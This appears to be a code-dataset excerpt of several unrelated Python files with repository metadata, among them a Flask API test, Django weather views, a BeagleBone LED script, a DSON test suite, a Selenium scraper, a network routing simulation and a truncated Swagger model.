'image_url': 'cdn.helllo.com/horse.jpg'},
{'id': '2465436',
'text': 'a cat!',
'image_url': 'cdn.helllo.com/kitty.jpg'},
],
}]
}
resp = self.app.post('/task/add',
data=json.dumps({
'task': task0}),
headers={},
content_type='application/json')
self.assertEqual(resp.status_code, 200)
userid = uuid.uuid4()
# register an android with a token
resp = self.app.post('/user/register',
data=json.dumps({
'user_id': str(userid),
'os': 'android',
'device_model': 'samsung8',
'device_id': '234234',
'time_zone': '05:00',
'token': 'fake_token',
'app_ver': '1.0'}),
headers={},
content_type='application/json')
self.assertEqual(resp.status_code, 200)
db.engine.execute("""update public.push_auth_token set auth_token='%s' where user_id='%s';""" % (str(userid), str(userid)))
resp = self.app.post('/user/auth/ack',
data=json.dumps({
'token': str(userid)}),
headers={USER_ID_HEADER: str(userid)},
content_type='application/json')
self.assertEqual(resp.status_code, 200)
# using sql, insert task results for task_id 0
db.engine.execute("""insert into public.user_task_results values('%s','%s','%s');""" % (str(userid), '0', json.dumps({'a': '1'})))
# get the user's current tasks
headers = {USER_ID_HEADER: userid}
resp = self.app.get('/user/tasks', headers=headers)
data = json.loads(resp.data)
print('data: %s' % data)
self.assertEqual(resp.status_code, 200)
print('next task id: %s' % data['tasks']['0'][0]['id'])
print('next task start date: %s' % data['tasks']['0'][0]['start_date'])
self.assertEqual(data['tasks']['0'][0]['id'], '0')
# send task results
resp = self.app.post('/user/task/results',
data=json.dumps({
'id': '0',
'address': 'GCYUCLHLMARYYT5EXJIK2KZJCMRGIKKUCCJKJOAPUBALTBWVXAT4F4OZ',
'results': {'2234': 'werw', '5345': '345345'},
'send_push': False
}),
headers={USER_ID_HEADER: str(userid)},
content_type='application/json')
print('post task results response: %s' % json.loads(resp.data))
self.assertEqual(resp.status_code, 200)
if __name__ == '__main__':
unittest.main()
| [
"ami.blonder@kik.com"
] | ami.blonder@kik.com |
686a2629d41be14e725d9eb6f5493df97ceabb57 | 73a3a1a885037888fae8a73785f7cc1fa206b384 | /wither/weather/views.py | e448ca4a04aa92e276ad4a66715e490128b43e51 | [] | no_license | crintus/wither | 9a45a45b0e5fd24ad917047ded51f63eb8b61b73 | de80a2c5f6609fe868b84936ae92a28d9cbdf38c | refs/heads/master | 2022-12-07T13:00:39.176374 | 2020-08-23T21:14:58 | 2020-08-23T21:14:58 | 289,426,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,183 | py | from typing import Dict
from rest_framework import permissions
from rest_framework.response import Response
from rest_framework.viewsets import ViewSet
from rest_framework.exceptions import ValidationError
from wither.open_weather_map.client import OpenWeatherMapClient
from wither.utils import latitude_longitude_from_location
class WeatherViewSet(ViewSet):
"""
Returns the raw weather data
"""
permission_classes = (permissions.AllowAny,)
def validate_query_params(self, params: Dict) -> None:
"""Validated the query params
Args:
params (dict): query params
Raises:
ValidationError: If the params are invalid
"""
if not params.get("location"):
raise ValidationError("The location query paramater is required.")
def list(self, request):
self.validate_query_params(request.query_params)
try:
lat, lon = latitude_longitude_from_location(
request.query_params.get("location")
)
except AttributeError:
raise ValidationError("Invalid location.")
weather_client = OpenWeatherMapClient(lat, lon)
return Response(weather_client.get(), status=200,)
class WeatherSummaryViewSet(ViewSet):
"""
Returns a summary of the weather data
"""
permission_classes = (permissions.AllowAny,)
def validate_query_params(self, params: Dict) -> None:
"""Validated the query params
Args:
params (dict): query params
Raises:
ValidationError: If the params are invalid
"""
if not params.get("location"):
raise ValidationError("The location query paramater is required.")
def list(self, request):
self.validate_query_params(request.query_params)
try:
lat, lon = latitude_longitude_from_location(
request.query_params.get("location")
)
except AttributeError:
raise ValidationError("Invalid location.")
weather_client = OpenWeatherMapClient(lat, lon)
period = request.query_params.get("period", None)
if period:
periods = period.split(",")
if len(periods) > 1:
period_start, period_end = periods
else:
period_start, period_end = periods[0], periods[0]
period_start = int(period_start)
period_end = int(period_end)
weather_client.filter(period_start, period_end)
return Response(
dict(
temp=dict(
avg=weather_client.average_temp(),
max=weather_client.max_temp(),
min=weather_client.min_temp(),
median=weather_client.median_temp(),
),
humidity=dict(
avg=weather_client.average_humidity(),
max=weather_client.max_humidity(),
min=weather_client.min_humidity(),
median=weather_client.median_humidity(),
),
),
status=200,
)
| [
"johandp92@gmail.com"
] | johandp92@gmail.com |
05902826e37452077afb0ce8c9a1be2f59efd2e5 | ba8111bdb52235e965188574b8584f01eaec8548 | /tests/indicators_test.py | 9cbefbea8c9121f8549c2bfb6758dd6838fb1bd2 | [] | no_license | BrendenDielissen-uofc/UofC-DAD | 66f6f45dd752bb1783cd719f4a648e95ffe1b070 | 192be0b12bae1837e8b42f71116cc60a922be2e7 | refs/heads/master | 2023-04-06T09:57:57.191069 | 2021-04-20T18:16:09 | 2021-04-20T18:16:09 | 346,522,677 | 0 | 1 | null | 2021-03-20T17:21:23 | 2021-03-10T23:41:44 | Python | UTF-8 | Python | false | false | 1,170 | py | # Python Packages
import Adafruit_BBIO.GPIO as GPIO
import time
from enum import Enum
class PINS(Enum):
"""BeagleBone Black pins enum."""
# GPIO
GPIO1_13 = 'GPIO1_13'
GPIO1_12 = 'GPIO1_12'
GPIO0_26 = 'GPIO0_26'
GPIO1_15 = 'GPIO1_15'
GPIO1_14 = 'GPIO1_14'
GPIO0_27 = 'GPIO0_27'
GPIO2_1 = 'GPIO2_1'
GPIO1_29 = 'GPIO1_29'
GPIO1_28 = 'GPIO1_28'
GPIO1_16 = 'GPIO1_16'
GPIO1_17 = 'GPIO1_17'
GPIO3_21 = 'GPIO3_21'
GPIO3_19 = 'GPIO3_19'
GPIO0_7 = 'GPIO0_7'
# ADC
AIN4 = 'AIN4'
AIN6 = 'AIN6'
AIN5 = 'AIN5'
AIN2 = 'AIN2'
AIN3 = 'AIN3'
AIN0 = 'AIN0'
AIN1 = 'AIN1'
LED1 = PINS.GPIO0_26.value
LED2 = PINS.GPIO1_13.value
print("LED1 on pin: {}".format(LED1))
print("LED2 on pin: {}".format(LED2))
input('\nCheck that pins are correct, then hit enter to continue...')
GPIO.setup(LED1, GPIO.OUT)
GPIO.setup(LED2, GPIO.OUT)
print('Flashing both LED\' 10 times:')
for i in range(10):
print('Flash {}'.format(i + 1))
GPIO.output(LED1, GPIO.HIGH)
GPIO.output(LED2, GPIO.HIGH)
time.sleep(1)
GPIO.output(LED1, GPIO.LOW)
GPIO.output(LED2, GPIO.LOW)
time.sleep(1)
| [
"brenden.dielissen@ucalgary.ca"
] | brenden.dielissen@ucalgary.ca |
2ef5d4dc4b0bcba12d63fd765b4904d56a422e43 | bc45f6a08534b1210b7adb7cdd7334c39a4529e0 | /ftl_project/wsgi.py | 28ad11037c3481b6bbb393f9efe41b592a8740f1 | [] | no_license | genardginoy/ftl_assignment | 637c6ddae93c152d65ede08e32975a05da77d967 | 8fa445ffbc376bc9a13a90d17cbb6c2b443ef45f | refs/heads/main | 2023-03-07T19:48:32.502855 | 2021-02-15T11:25:57 | 2021-02-15T11:25:57 | 338,813,229 | 0 | 0 | null | 2021-02-15T10:56:39 | 2021-02-14T13:36:55 | Python | UTF-8 | Python | false | false | 399 | py | """
WSGI config for ftl_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ftl_project.settings")
application = get_wsgi_application()
| [
"gino.p.vincent@gmail.com"
] | gino.p.vincent@gmail.com |
d8620c41a734cc922c22e305fca645a8fba03438 | 88e9d97389085df663769643aee85d9a339bb8f2 | /atomic/electron_cooling.py | 60525a975393ef036cd0fa0cbef79689e6eb7a76 | [
"MIT"
] | permissive | shawnzamperini/atomic | 757e3ebd07f84981614ff55eef218c43044c97b2 | 5e5617eff02aaf4ce5448c44f0b32fff72815b69 | refs/heads/master | 2021-06-18T23:55:07.624007 | 2016-12-14T19:38:20 | 2016-12-14T19:38:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,157 | py | import numpy as np
import matplotlib.pyplot as plt
from atomic_data import ZeroCoefficient
from radiation import Radiation
# This class is almost a copy of Radiation; only
# _get_staging_coeffs / _get_power_coeffs and _compute_power are different.
class ElectronCooling(object):
"""
Electron cooling power is radiation + ionisation - recombination.
This class calculates electron cooling power for an ionisation
stage distribution at given electron densities and temperatures.
In collisional radiative equilibrium, ElectronCooling.power will
equal Radiation.power, since the same amount of ions are being
ionised and recombined each second.
Attributes:
rad: a Radiation object.
y: a FractionalAbundance object.
atomic_data: that FrAb's atomic data.
temperature (np.array): that FrAb's temperature list.
electron_density (np.array or float): that FrAb's density list.
impurity_fraction: ???
n_impurity = n_e * impurity_fraction
neutral_fraction: fraction of neutral hydrogen, for cx_power.
n_n = n_e * neutral_fraction
"""
def __init__(self, ionisation_stage_distribution, impurity_fraction=1.,
neutral_fraction=0.):
self.y = ionisation_stage_distribution
self.atomic_data = ionisation_stage_distribution.atomic_data
self.temperature = self.y.temperature
self.electron_density = self.y.density
self.impurity_fraction = impurity_fraction
self.neutral_fraction = neutral_fraction
self.eV = 1.6e-19
self.rad = Radiation(ionisation_stage_distribution, impurity_fraction,
neutral_fraction)
@property
def power(self):
return self._compute_power()
@property
def specific_power(self):
"""Power per electron per impurity nucleus, [W m^3]"""
power = self.power
for key in power.keys():
power[key] /= self.electron_density * self.get_impurity_density()
return power
def epsilon(self, tau):
"""Electron cooling energy per ion [eV], given the lifetime tau."""
eps = {}
for k in 'rad_total', 'total':
eps[k] = self.specific_power[k] * self.electron_density * tau / self.eV
return eps
def get_impurity_density(self):
return self.impurity_fraction * self.electron_density
def get_neutral_density(self):
return self.neutral_fraction * self.electron_density
def _get_staging_coeffs(self):
"""Get a dict of RateCoefficient objects.
Returns:
{'ionisation': : <RateCoefficient object>,
'recombination' : <RateCoefficient object>,
'ionisation_potential' : <RateCoefficient object>}
"""
staging_coeffs = {}
for key in ['ionisation', 'recombination', 'ionisation_potential']:
staging_coeffs[key] = self.atomic_data.coeffs.get(key,
ZeroCoefficient())
return staging_coeffs
def _compute_power(self):
"""
Compute electron cooling power density in [W/m3].
"""
shape_ = self.atomic_data.nuclear_charge, self.temperature.shape[0]
staging_coeffs = self._get_staging_coeffs()
staging_power = {}
staging_power_keys = 'ionisation', 'recombination'
for key in staging_power_keys:
staging_power[key] = np.zeros(shape_)
ne = self.electron_density
ni = self.get_impurity_density()
y = self.y # a FractionalAbundance
for k in xrange(self.atomic_data.nuclear_charge):
# in joules per ionisation stage transition
# note that the temperature and density don't matter for the potential.
potential = self.eV * staging_coeffs['ionisation_potential'](k, self.temperature, self.electron_density)
for key in staging_power_keys:
coeff = staging_coeffs[key](k, self.temperature,
self.electron_density)
# somewhat ugly...
if key == 'recombination':
sign, shift = -1, 1
else:
sign, shift = 1, 0
scale = ne * ni * y.y[k+shift] * potential
staging_power[key][k] = sign * scale * coeff
# sum over all ionisation stages
for key in staging_power.keys():
staging_power[key] = staging_power[key].sum(0)
# now get the radiation power.
# gets a dict with keys line, continuum, cx, total
rad_power = self.rad._compute_power()
# save rad_total for later
rad_total = rad_power.pop('total')
# this is a Bad Idea on how to merge two dicts but oh well
# http://stackoverflow.com/questions/38987/how-can-i-merge-two-python-dictionaries-in-a-single-expression
cooling_power = dict(rad_power.items() + staging_power.items())
cooling_power['total'] = reduce(lambda x,y: x+y,
cooling_power.values())
cooling_power['rad_total'] = rad_total
return cooling_power
| [
"thesquarerootofjacob@gmail.com"
] | thesquarerootofjacob@gmail.com |
45f594f8c02d9c3a3e341e690b24eef1529dece0 | 9d8a6df016e3f7aca9dda22858cee643f7247a1f | /models/backbone.py | 05f790d4896148ef56e4658af2a51464111b2d63 | [] | no_license | wxywb/detection | 36b066b72b47fee5984f0b1e961de1c8321e9a5b | 8fbac8656d2c3e06eccb4113f1c424efebac303c | refs/heads/master | 2020-04-07T09:28:08.450632 | 2018-11-19T16:06:48 | 2018-11-19T16:06:48 | 158,253,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | import torch as t
from torch import nn
from torchvision.models import vgg16
def init_from_vgg16():
model = vgg16()
features = model.features
classifiers = model.classifier
not_use_dropout = True
if not_use_dropout:
del classifiers[2]
del classifiers[5]
for layer in features[:10]:
for p in layer.parameters():
p.require_grad = False
features = nn.Sequential(*features)
classifiers = nn.Sequential(*classifiers)
return features, classifiers
if __name__ == '__main__':
m, c = init_from_vgg16()
print(c)
| [
"285088914@qq.com"
] | 285088914@qq.com |
7ef5899fc65729bb3d4169066bc9065937633f77 | 8565e4d24b537d1fb0f71fef6215d193ceaed6cc | /tests/test_check_circular.py | 4a91863962a4377cf6bad0ba6466463a0579f885 | [
"MIT"
] | permissive | soasme/dogeon | 5f55c84a6f93aaa7757372664dd60ed90cf200e8 | 496b9a5b099946d14434ed0cd7a94a270f607207 | refs/heads/master | 2020-05-17T19:01:42.780694 | 2018-11-04T05:01:23 | 2018-11-04T05:01:23 | 20,592,607 | 3 | 0 | null | 2014-06-28T01:34:35 | 2014-06-07T12:28:07 | Python | UTF-8 | Python | false | false | 736 | py | import dson
import pytest
def default_iterable(obj):
return list(obj)
def test_circular_dict():
dct = {}
dct['a'] = dct
pytest.raises(ValueError, dson.dumps, dct)
def test_circular_list():
lst = []
lst.append(lst)
pytest.raises(ValueError, dson.dumps, lst)
def test_circular_composite():
dct2 = {}
dct2['a'] = []
dct2['a'].append(dct2)
pytest.raises(ValueError, dson.dumps, dct2)
def test_circular_default():
dson.dumps([set()], default=default_iterable)
pytest.raises(TypeError, dson.dumps, [set()])
def test_circular_off_default():
dson.dumps([set()], default=default_iterable, check_circular=False)
pytest.raises(TypeError, dson.dumps, [set()], check_circular=False)
| [
"soasme@gmail.com"
] | soasme@gmail.com |
9c9da976da567c09a2ddb3bb40e51bc5d963025d | cf77642fc2a475149db7ce8178c3d0446eeba785 | /main.py | 9a5b1114405359843ba943e5c607cae75782d923 | [] | no_license | ijhwanny/crawling | 3470d5b5d0199565aad0925da7c810e3c9affd62 | 82ec1dbfb6ce0e8d89796414435f1af4eaf5df22 | refs/heads/master | 2021-01-04T07:36:53.393811 | 2020-02-17T02:41:15 | 2020-02-17T02:41:15 | 240,449,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | from bs4 import BeautifulSoup as bs
from selenium import webdriver
import time
from selenium.webdriver.common.keys import Keys
# set Chrome webdriver
drv_path = "C:/Users/ijhwa/Downloads/chromedriver_win32/chromedriver.exe"
driver = webdriver.Chrome(drv_path)
driver.implicitly_wait(3)
category = 'ai_ml'
target_url = 'http://www.dinnopartners.com/category/%s/' % (category)
driver.get(target_url)
# assert "Google" in driver.title
html = driver.page_source
soup = bs(html, 'html.parser')
res = soup.body.find_all('h2', class_='title-post entry-title')
for n in res:
print(n.get_text())
# assert "No results found." not in driver.page_source
driver.close()
| [
"alvin.jhkim@gmail.com"
] | alvin.jhkim@gmail.com |
e101525b6580e78fdc853b7f98f4fac5ef734d92 | a23bb3362ccc1da7d11cd34444650f3c83c0f6b0 | /hsrl/HsrlProductServer/RawDataRay.py | 726a4d658777d8a9eac5b1edc3b5332098a5eb57 | [] | no_license | glassstone/HSRL_python_Brad | a39407274682b0904890b471507095a0bb053ca0 | 1cece92d8bf57c0b5cc52b7dbc14d69bc21705f2 | refs/heads/master | 2020-05-21T07:08:23.273927 | 2017-02-13T22:55:36 | 2017-02-13T22:55:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,098 | py | #!/usr/bin/python
from datetime import datetime
from copy import copy
from PyQt4.QtCore import *
class RawDataRay(QObject):
def __init__(self, rayTime, nBins, nGoodShots, xmittedEnergyCounts,
binWidth, dwellTime, pointingDir,
combinedHiData, combinedLoData, crossData, molecularData):
"""
Construct a RawDataRay from the given arguments:
rayTime - datetime object containing the ray time
nBins - number of bins in the data
nGoodShots - number of good laser shots in the accumulation
xmittedEnergyCounts - raw counts of transmitted energy summed
for all shots in the ray
binWidth - width of a data bin, m
dwellTime - period over which the accumulation was sampled
pointingDir - telescope pointing direction (0->down, 1->up)
combinedHiData - nBins of raw counts from the 'combined_hi' accumulator channel
combinedLoData - nBins of raw counts from the 'combined_lo' accumulator channel
crossData - nBins of raw counts from the 'cross' accumulator channel
molecularData - nBins of raw counts from the 'molecular' accumulator channel
"""
QObject.__init__(self)
if (not isinstance(rayTime, datetime)):
raise TypeError('rayTime must be of type datetime')
self.__rayTime = copy(rayTime)
self.__nBins = nBins
self.__nGoodShots = nGoodShots
self.__xmittedEnergyCounts = xmittedEnergyCounts
self.__binWidth = binWidth
self.__dwellTime = dwellTime
self.__pointingDir = pointingDir
# Copy the data arrays, validating that the length of each array matches
# the given gate count
assert (len(combinedHiData) == nBins), "bad length for combined_hi data"
self.__combinedHiData = combinedHiData
assert (len(combinedLoData) == nBins), "bad length for combined_lo data"
self.__combinedLoData = combinedLoData
assert (len(crossData) == nBins), "bad length for cross data"
self.__crossData = crossData
assert (len(molecularData) == nBins), "bad length for molecular data"
self.__molecularData = molecularData
def rayTime(self):
"""
Return the datetime for this ray
"""
return self.__rayTime
def nBins(self):
"""
Return the number of bins in this ray
"""
return self.__nBins
def nGoodShots(self):
"""
The number of good laser shots accumulated in this ray
"""
return self.__nGoodShots
def xmittedEnergyCounts(self):
"""
The raw counts from the transmitted energy monitor summed over all
laser shots included in this ray.
"""
return self.__xmittedEnergyCounts
def binWidth(self):
"""
The bin width for this ray, m
"""
return self.__binWidth
def dwellTime(self):
"""
The dwell time for this ray, s
"""
return self.__dwellTime
def pointingDir(self):
"""
Pointing direction for this ray (0->down, 1->up)
"""
return self.__pointingDir
def combinedHiData(self):
"""
Return the list of counts from the 'combined_hi' channel for this
ray.
"""
return self.__combinedHiData
def combinedLoData(self):
"""
Return the list of counts from the 'combined_lo' channel for this
ray.
"""
return self.__combinedLoData
def crossData(self):
"""
Return the list of counts from the 'cross' channel for this
ray.
"""
return self.__crossData
def molecularData(self):
"""
Return the list of counts from the 'molecular' channel for this
ray.
"""
return self.__molecularData
| [
"brads@ucar.edu"
] | brads@ucar.edu |
e967cafe8cabee4fb93955481b240a804ce2626a | 5025225669388ae98f9589e1be589110d50b9c9e | /forest/initialRUN.py | e99ee693d53c1ba904842a67ef15859d7ec4d95a | [] | no_license | spajpasu/AutoBin | e5d09b05acb2853eb779d583d36d35fca89e3e5f | 71bd7a35c2cc4946da0645f302bb2a952ec53897 | refs/heads/master | 2021-05-17T00:57:22.472208 | 2020-07-18T16:02:54 | 2020-07-18T16:02:54 | 250,545,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 558 | py | import LatLonCreator
import LatLong
import InputData
import GeneralOperations as GO
'''osmium is developed with concept of handler, which takes in file name, it has some predefined functions that we can
use to get the data from OSM file'''
# number of trees corresponding to each node
# print(GO.node_loc)
# print(GO.railway_polygon)
h = LatLonCreator.ForestDataHandler()
# print(InputData.path)
# location of file goes as input to apply_file
h.apply_file(InputData.path)
print('Files Created')
# LatLong.LatLong().plot_nodes() | [
"noreply@github.com"
] | noreply@github.com |
871db5e6912156978094ec67daac0879e592453f | e96b44f5fdc5d99e587065d2bdebf9db57721fa2 | /Exersice/factorAndCount.py | 403259de06c600c9030a6dd4888f60a1fa364c4f | [] | no_license | amiraliucsc/Projects | e7339d8cee58397438bac48e808459977927ab48 | b1fe4549b0583e73406037a7e48cc34317b2068f | refs/heads/master | 2021-01-18T12:17:00.117341 | 2016-05-25T08:02:21 | 2016-05-25T08:02:21 | 49,929,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 18 12:46:51 2016
@author: Amirali
Return the number of occurance of x in factorization of n. Example n=24 , x=2
must return 3 since 24 = 2^3*3 or n=25,5 must return 2 since 25 = 5^2
"""
def two_count(n,x):
stop = False
rem = 0
div = 2
count = 0
countFor = x
while(not stop):
rem = n % div
if (rem > 0):
div+=1
else:
if div == countFor:
count+=1
n = (n // div)
div = 2
if (n == 1):
stop = True
return count
print(two_count(4,2)) | [
"ashahinp@ucsc.edu"
] | ashahinp@ucsc.edu |
3eee00da21dfd424582553120dc6e7ea8ead195e | 85dbb4cebdfa0ed877c72d0b10f5cc6a1881d168 | /Senior Year/Fall Semester/CS466/Assignment 4/New Assignment 4/Control_3/simulation_3.py | ce19b833a85c64dc523488938185bc2c7616c938 | [] | no_license | brockellefson/school | 298963e0d61b0e748b248964641255a8f172e55c | 5ccca65f160254af990f15da8ccb1c99c5c9ea74 | refs/heads/master | 2021-01-22T06:28:49.363224 | 2018-09-30T20:05:20 | 2018-09-30T20:05:20 | 81,759,107 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,141 | py | import network_3
import link_3
import threading
from time import sleep
import sys
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 10 #give the network sufficient time to execute transfers
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads at the end
#create network hosts
host_1 = network_3.Host('H1')
object_L.append(host_1)
host_2 = network_3.Host('H2')
object_L.append(host_2)
host_3 = network_3.Host('H3')
object_L.append(host_3)
#create routers and cost tables for reaching neighbors
cost_D = {'H1': {0: 1}, 'H2': {1: 1}, 'RB': {2: 5}, 'RC': {3: 40}} # {neighbor: {interface: cost}}
router_a = network_3.Router(name='RA',
cost_D = cost_D,
max_queue_size=router_queue_size)
object_L.append(router_a)
cost_D = {'RA': {0: 5}, 'RD': {1: 3}} # {neighbor: {interface: cost}}
router_b = network_3.Router(name='RB',
cost_D = cost_D,
max_queue_size=router_queue_size)
object_L.append(router_b)
cost_D = {'RA': {0: 40}, 'RD': {1: 4}} # {neighbor: {interface: cost}}
router_c = network_3.Router(name='RC',
cost_D = cost_D,
max_queue_size=router_queue_size)
object_L.append(router_c)
cost_D = {'RB': {0: 3}, 'RC': {1: 4}, 'H3': {2:3}} # {neighbor: {interface: cost}}
router_d = network_3.Router(name='RD',
cost_D = cost_D,
max_queue_size=router_queue_size)
object_L.append(router_d)
#create a Link Layer to keep track of links between network nodes
link_layer = link_3.LinkLayer()
object_L.append(link_layer)
#add all the links - need to reflect the connectivity in cost_D tables above
link_layer.add_link(link_3.Link(host_1, 0, router_a, 0))
link_layer.add_link(link_3.Link(host_2, 0, router_a, 1))
link_layer.add_link(link_3.Link(router_a, 2, router_b, 0))
link_layer.add_link(link_3.Link(router_a, 3, router_c, 0))
link_layer.add_link(link_3.Link(router_b, 1, router_d, 0))
link_layer.add_link(link_3.Link(router_c, 1, router_d, 1))
link_layer.add_link(link_3.Link(router_d, 2,host_3, 0))
#start all the objects
thread_L = []
for obj in object_L:
thread_L.append(threading.Thread(name=obj.__str__(), target=obj.run))
for t in thread_L:
t.start()
## compute routing tables
router_a.send_routes(2) #one update starts the routing process
sleep(simulation_time) #let the tables converge
print("Converged routing tables")
for obj in object_L:
if str(type(obj)) == "<class 'network_3.Router'>":
obj.print_routes()
#send packet from host 1 to host 2
host_3.udt_send('H1', 'The way you look should be a sin you my sinsation')
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
| [
"brockilli03@gmail.com"
] | brockilli03@gmail.com |
4dee5e0f7b4cc51baf47bb8c3e8933d77c641c85 | c47340ae6bcac6002961cc2c6d2fecb353c1e502 | /controlm_py/models/fts_general_settings.py | 9eab4959b0d808a9b66815d288744bfd62ea5263 | [
"MIT"
] | permissive | rafaeldelrey/controlm_py | 6d9f56b8b6e72750f329d85b932ace6c41002cbd | ed1eb648d1d23e587321227217cbfcc5065535ab | refs/heads/main | 2023-04-23T09:01:32.024725 | 2021-05-19T00:25:53 | 2021-05-19T00:25:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,131 | py | # coding: utf-8
"""
Control-M Services
Provides access to BMC Control-M Services # noqa: E501
OpenAPI spec version: 9.20.115
Contact: customer_support@bmc.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class FtsGeneralSettings(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'home_directory': 'str',
'multiple_login_allowed': 'bool',
'max_open_sessions': 'int',
'max_login_failures': 'int',
'delay_after_login_failure': 'int',
'throttling_activated': 'bool',
'max_simultaneous_uploads': 'int',
'max_simultaneous_downloads': 'int'
}
attribute_map = {
'home_directory': 'homeDirectory',
'multiple_login_allowed': 'multipleLoginAllowed',
'max_open_sessions': 'maxOpenSessions',
'max_login_failures': 'maxLoginFailures',
'delay_after_login_failure': 'delayAfterLoginFailure',
'throttling_activated': 'throttlingActivated',
'max_simultaneous_uploads': 'maxSimultaneousUploads',
'max_simultaneous_downloads': 'maxSimultaneousDownloads'
}
def __init__(self, home_directory=None, multiple_login_allowed=None, max_open_sessions=None, max_login_failures=None, delay_after_login_failure=None, throttling_activated=None, max_simultaneous_uploads=None, max_simultaneous_downloads=None): # noqa: E501
"""FtsGeneralSettings - a model defined in Swagger""" # noqa: E501
self._home_directory = None
self._multiple_login_allowed = None
self._max_open_sessions = None
self._max_login_failures = None
self._delay_after_login_failure = None
self._throttling_activated = None
self._max_simultaneous_uploads = None
self._max_simultaneous_downloads = None
self.discriminator = None
if home_directory is not None:
self.home_directory = home_directory
if multiple_login_allowed is not None:
self.multiple_login_allowed = multiple_login_allowed
if max_open_sessions is not None:
self.max_open_sessions = max_open_sessions
if max_login_failures is not None:
self.max_login_failures = max_login_failures
if delay_after_login_failure is not None:
self.delay_after_login_failure = delay_after_login_failure
if throttling_activated is not None:
self.throttling_activated = throttling_activated
if max_simultaneous_uploads is not None:
self.max_simultaneous_uploads = max_simultaneous_uploads
if max_simultaneous_downloads is not None:
self.max_simultaneous_downloads = max_simultaneous_downloads
@property
def home_directory(self):
"""Gets the home_directory of this FtsGeneralSettings. # noqa: E501
Root path where transferred files are stored. If you want to use a different directory for each logged in user, you must add /${userName} to the path. # noqa: E501
:return: The home_directory of this FtsGeneralSettings. # noqa: E501
:rtype: str
"""
return self._home_directory
@home_directory.setter
def home_directory(self, home_directory):
"""Sets the home_directory of this FtsGeneralSettings.
Root path where transferred files are stored. If you want to use a different directory for each logged in user, you must add /${userName} to the path. # noqa: E501
:param home_directory: The home_directory of this FtsGeneralSettings. # noqa: E501
:type: str
"""
self._home_directory = home_directory
@property
def multiple_login_allowed(self):
"""Gets the multiple_login_allowed of this FtsGeneralSettings. # noqa: E501
Allow multiple open sessions # noqa: E501
:return: The multiple_login_allowed of this FtsGeneralSettings. # noqa: E501
:rtype: bool
"""
return self._multiple_login_allowed
@multiple_login_allowed.setter
def multiple_login_allowed(self, multiple_login_allowed):
"""Sets the multiple_login_allowed of this FtsGeneralSettings.
Allow multiple open sessions # noqa: E501
:param multiple_login_allowed: The multiple_login_allowed of this FtsGeneralSettings. # noqa: E501
:type: bool
"""
self._multiple_login_allowed = multiple_login_allowed
@property
def max_open_sessions(self):
"""Gets the max_open_sessions of this FtsGeneralSettings. # noqa: E501
Maximum concurrent open sessions # noqa: E501
:return: The max_open_sessions of this FtsGeneralSettings. # noqa: E501
:rtype: int
"""
return self._max_open_sessions
@max_open_sessions.setter
def max_open_sessions(self, max_open_sessions):
"""Sets the max_open_sessions of this FtsGeneralSettings.
Maximum concurrent open sessions # noqa: E501
:param max_open_sessions: The max_open_sessions of this FtsGeneralSettings. # noqa: E501
:type: int
"""
self._max_open_sessions = max_open_sessions
@property
def max_login_failures(self):
"""Gets the max_login_failures of this FtsGeneralSettings. # noqa: E501
Number of retries before the server closes the connection # noqa: E501
:return: The max_login_failures of this FtsGeneralSettings. # noqa: E501
:rtype: int
"""
return self._max_login_failures
@max_login_failures.setter
def max_login_failures(self, max_login_failures):
"""Sets the max_login_failures of this FtsGeneralSettings.
Number of retries before the server closes the connection # noqa: E501
:param max_login_failures: The max_login_failures of this FtsGeneralSettings. # noqa: E501
:type: int
"""
self._max_login_failures = max_login_failures
@property
def delay_after_login_failure(self):
"""Gets the delay_after_login_failure of this FtsGeneralSettings. # noqa: E501
Time of waiting before letting the user to do another login in seconds # noqa: E501
:return: The delay_after_login_failure of this FtsGeneralSettings. # noqa: E501
:rtype: int
"""
return self._delay_after_login_failure
@delay_after_login_failure.setter
def delay_after_login_failure(self, delay_after_login_failure):
"""Sets the delay_after_login_failure of this FtsGeneralSettings.
Time of waiting before letting the user to do another login in seconds # noqa: E501
:param delay_after_login_failure: The delay_after_login_failure of this FtsGeneralSettings. # noqa: E501
:type: int
"""
self._delay_after_login_failure = delay_after_login_failure
@property
def throttling_activated(self):
"""Gets the throttling_activated of this FtsGeneralSettings. # noqa: E501
Allow bandwidth throttling # noqa: E501
:return: The throttling_activated of this FtsGeneralSettings. # noqa: E501
:rtype: bool
"""
return self._throttling_activated
@throttling_activated.setter
def throttling_activated(self, throttling_activated):
"""Sets the throttling_activated of this FtsGeneralSettings.
Allow bandwidth throttling # noqa: E501
:param throttling_activated: The throttling_activated of this FtsGeneralSettings. # noqa: E501
:type: bool
"""
self._throttling_activated = throttling_activated
@property
def max_simultaneous_uploads(self):
"""Gets the max_simultaneous_uploads of this FtsGeneralSettings. # noqa: E501
Maximum simultaneos uploads # noqa: E501
:return: The max_simultaneous_uploads of this FtsGeneralSettings. # noqa: E501
:rtype: int
"""
return self._max_simultaneous_uploads
@max_simultaneous_uploads.setter
def max_simultaneous_uploads(self, max_simultaneous_uploads):
"""Sets the max_simultaneous_uploads of this FtsGeneralSettings.
Maximum simultaneos uploads # noqa: E501
